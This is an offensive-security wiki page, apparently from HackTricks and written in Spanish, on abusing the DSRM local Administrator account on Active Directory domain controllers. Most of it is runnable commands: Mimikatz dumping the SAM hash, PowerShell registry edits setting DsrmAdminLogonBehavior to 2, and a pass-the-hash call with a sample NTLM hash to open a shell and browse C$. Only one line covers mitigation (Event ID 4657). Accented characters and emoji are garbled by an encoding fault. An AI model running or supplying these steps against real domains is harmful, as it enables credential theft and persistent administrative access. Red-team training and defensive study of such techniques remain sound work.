HackTrickstip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Credenciales DSRM
Hay una cuenta de administrador local dentro de cada DC. Teniendo privilegios de administrador en esta m谩quina, puedes usar mimikatz para extraer el hash del Administrador local. Luego, modificando un registro para activar esta contrase帽a para que puedas acceder de forma remota a este usuario Administrador local.
Primero necesitamos extraer el hash del usuario Administrador local dentro del DC:
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'
Luego necesitamos verificar si esa cuenta funcionar谩, y si la clave del registro tiene el valor "0" o no existe, necesitas configurarla a "2":
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 #Change value to "2"
Luego, usando un PTH puedes listar el contenido de C$ o incluso obtener un shell. Ten en cuenta que para crear una nueva sesi贸n de powershell con ese hash en memoria (para el PTH) el "dominio" utilizado es solo el nombre de la m谩quina DC:
sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$
M谩s informaci贸n sobre esto en: https://adsecurity.org/?p=1714 y https://adsecurity.org/?p=1785
Mitigaci贸n
- Event ID 4657 - Auditor铆a de creaci贸n/cambio de
HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.